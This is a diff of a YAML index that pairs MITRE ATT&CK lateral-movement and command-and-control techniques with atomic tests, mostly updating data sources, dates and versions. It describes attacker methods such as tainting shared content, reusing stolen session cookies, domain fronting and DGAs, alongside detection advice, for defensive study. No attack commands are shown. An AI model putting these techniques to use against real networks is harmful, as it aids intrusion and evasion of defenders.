@@ -58447,7 +61882,7 @@ lateral-movement: source_name: capec url: https://capec.mitre.org/data/definitions/187.html description: |- - Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). + Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. 
@@ -58461,18 +61896,13 @@ lateral-movement: phase_name: execution - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T15:27:01.403Z' + modified: '2020-12-11T17:00:00.938Z' created: '2017-05-31T21:30:57.201Z' x_mitre_is_subtechnique: false x_mitre_version: '2.1' x_mitre_data_sources: - - Authentication logs - - File monitoring - - Third-party application logs - - Windows Registry - - Process monitoring - - Process use of network - - Binary file metadata + - 'Application Log: Application Log Content' + - 'Process: Process Creation' x_mitre_detection: "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities 
@@ -58505,14 +61935,16 @@ lateral-movement: atomic_tests: [] T1080: technique: - created: '2017-05-31T21:31:01.759Z' - modified: '2020-03-31T22:14:56.107Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: lateral-movement - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Taint Shared Content + description: |2- + + Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. + + A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. 
(Citation: Retwin Directory Share Pivot) + + Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS. external_references: - source_name: mitre-attack external_id: T1080 
@@ -58524,34 +61956,34 @@ lateral-movement: description: Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018. source_name: Retwin Directory Share Pivot - description: |2- - - Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. - - A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot) - - Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. 
The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS. - name: Taint Shared Content - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c - x_mitre_version: '1.2' - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_contributors: - - Michal Dida, ESET - - David Routin + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: lateral-movement + modified: '2020-03-31T22:14:56.107Z' + created: '2017-05-31T21:31:01.759Z' + x_mitre_is_subtechnique: false + x_mitre_system_requirements: + - Access to shared folders and content with write permissions + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User x_mitre_detection: |- Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques. Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content. 
- x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - x_mitre_system_requirements: - - Access to shared folders and content with write permissions - x_mitre_is_subtechnique: false + x_mitre_contributors: + - Michal Dida, ESET + - David Routin + x_mitre_data_sources: + - 'Process: Process Creation' + - 'File: File Creation' + - 'File: File Modification' + - 'Network Share: Network Share Access' + x_mitre_version: '1.2' atomic_tests: [] T1550: technique: @@ -58599,9 +62031,9 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.714Z' + modified: '2021-04-14T18:09:47.427Z' created: '2020-01-30T16:18:36.873Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - System Access Controls @@ -58617,13 +62049,16 @@ lateral-movement: user has an active login session but has not entered the building or does not have VPN access).' x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs - - Authentication logs + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' + - 'User Account: User Account Authentication' + - 'Active Directory: Active Directory Credential Request' x_mitre_platforms: - Windows - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1021.005: technique: 
@@ -58652,9 +62087,9 @@ lateral-movement: x_mitre_system_requirements: - VNC server installed and listening for connections. x_mitre_data_sources: - - Process use of network - - Network protocol analysis - - Netflow/Enclave netflow + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior @@ -58681,7 +62116,7 @@ lateral-movement: source_name: Pass The Cookie - source_name: Unit 42 Mac Crypto Cookies January 2019 url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ - description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 
@@ -58690,7 +62125,7 @@ lateral-movement: description: |- Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie) - Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. + Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. 
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) id: attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0 @@ -58700,9 +62135,9 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.527Z' + modified: '2021-04-14T13:21:37.474Z' created: '2020-01-30T17:48:49.395Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -58710,13 +62145,14 @@ lateral-movement: applications by the same user in different locations or by different systems that do not match expected configurations. x_mitre_data_sources: - - Office 365 audit logs - - Authentication logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Johann Rehberger x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1021.006: technique: @@ -58764,11 +62200,10 @@ lateral-movement: - User - Administrator x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs - - File monitoring + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' identifier: T1021.006 atomic_tests: - name: Enable Windows Remote Management 
@@ -58844,16 +62279,15 @@ lateral-movement: command-and-control: T1071: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1071 - url: https://attack.mitre.org/techniques/T1071 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 + created: '2017-05-31T21:30:56.776Z' + modified: '2020-10-21T16:35:45.986Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Application Layer Protocol description: "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will 
@@ -58862,23 +62296,22 @@ command-and-control: transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. " - name: Application Layer Protocol - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T16:35:45.986Z' - created: '2017-05-31T21:30:56.776Z' - x_mitre_version: '2.0' - x_mitre_data_sources: - - DNS records - - Network protocol analysis - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Process monitoring + external_references: + - source_name: mitre-attack + external_id: T1071 + url: https://attack.mitre.org/techniques/T1071 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have 
@@ -58886,26 +62319,18 @@ command-and-control: layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)' - x_mitre_network_requirements: true - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_version: '2.0' atomic_tests: [] T1573.002: technique: - created: '2020-03-16T15:48:33.882Z' - modified: '2020-03-30T00:37:16.593Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada description: |- Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. - For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). + For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. 
As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). name: Asymmetric Cryptography created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -58926,16 +62351,18 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2021-04-20T19:27:46.484Z' + created: '2020-03-16T15:48:33.882Z' x_mitre_platforms: - Linux - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process use of network - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks) 
@@ -58945,13 +62372,18 @@ command-and-control: atomic_tests: [] T1102.002: technique: - created: '2020-03-14T22:34:03.024Z' - modified: '2020-03-26T23:15:47.861Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4 + external_references: + - source_name: mitre-attack + external_id: T1102.002 + url: https://attack.mitre.org/techniques/T1102/002 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bidirectional Communication description: "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular 
@@ -58967,28 +62399,17 @@ command-and-control: Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. " - name: Bidirectional Communication - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1102.002 - url: https://attack.mitre.org/techniques/T1102/002 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection + id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-03-26T23:15:47.861Z' + created: '2020-03-14T22:34:03.024Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User x_mitre_detection: 'Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and 
@@ -58997,10 +62418,14 @@ command-and-control: for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)' - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Connection Creation' + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1043: technique: @@ -59035,11 +62460,6 @@ command-and-control: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e x_mitre_version: '1.0' - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Process monitoring x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have @@ -59088,8 +62508,8 @@ command-and-control: x_mitre_detection: Monitor file access on removable media. Detect processes that execute when removable media is mounted. x_mitre_data_sources: - - File monitoring - - Data loss prevention + - 'Drive: Drive Creation' + - 'Drive: Drive Access' x_mitre_version: '1.0' atomic_tests: [] T1071.004: @@ -59142,11 +62562,8 @@ command-and-control: Monitor for DNS traffic to/from known-bad or suspicious domains. x_mitre_data_sources: - - Netflow/Enclave netflow - - DNS records - - Process monitoring - - Process use of network - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS 
@@ -59311,7 +62728,7 @@ command-and-control: modified: '2020-03-27T20:54:28.287Z' created: '2020-03-11T14:56:34.154Z' x_mitre_data_sources: - - DNS records + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_detection: Detection for this technique is difficult because it would @@ -59367,10 +62784,7 @@ command-and-control: - User x_mitre_network_requirements: true x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have @@ -59422,10 +62836,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.1' atomic_tests: [] T1102.001: @@ -59460,11 +62871,8 @@ command-and-control: - macOS - Windows x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and 
@@ -59479,6 +62887,21 @@ command-and-control: atomic_tests: [] T1090.004: technique: + created: '2020-03-14T23:29:19.581Z' + modified: '2020-09-16T19:30:54.226Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2 + description: |- + Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). + + For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y. + name: Domain Fronting + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1090.004 
@@ -59492,39 +62915,40 @@ command-and-control: Retrieved November 20, 2017. source_name: Fifield Blocking Resistent Communication through domain fronting 2015 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Fronting - description: |- - Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). - - For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y. - id: attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-09-16T19:30:54.226Z' - created: '2020-03-14T23:29:19.581Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted, - the Host field of the HTTP header can be checked if it matches the HTTPS SNI - or against a blocklist or allowlist of domain names. 
(Citation: Fifield Blocking - Resistent Communication through domain fronting 2015)' - x_mitre_data_sources: - - SSL/TLS inspection - - Packet capture - x_mitre_contributors: - - Matt Kelly, @breakersall x_mitre_platforms: - Linux - macOS - Windows + x_mitre_contributors: + - Matt Kelly, @breakersall + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Content' + x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted, + the Host field of the HTTP header can be checked if it matches the HTTPS SNI + or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking + Resistent Communication through domain fronting 2015)' + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1568.002: technique: + created: '2020-03-10T17:44:59.787Z' + modified: '2020-11-10T18:28:57.002Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd + description: |- + Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) + + DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). 
Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) + + Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) + name: Domain Generation Algorithms + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1568.002 
@@ -59566,50 +62990,30 @@ command-and-control: description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019. - - source_name: Endgame Predicting DGA + - source_name: Elastic Predicting DGA url: https://arxiv.org/pdf/1611.00791.pdf description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Generation Algorithms - description: |- - Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) - - DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) - - Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). 
When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) - id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-02T01:37:39.618Z' - created: '2020-03-10T17:44:59.787Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains. - - Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. 
If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA) - x_mitre_data_sources: - - DNS records - - Netflow/Enclave netflow - - Network device logs - - Packet capture - - Process use of network - x_mitre_contributors: - - Ryan Benson, Exabeam - - Barry Shteiman, Exabeam - - Sylvain Gil, Exabeam x_mitre_platforms: - Linux - macOS - Windows + x_mitre_contributors: + - Ryan Benson, Exabeam + - Barry Shteiman, Exabeam + - Sylvain Gil, Exabeam + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + x_mitre_detection: |- + Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains. + + Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. 
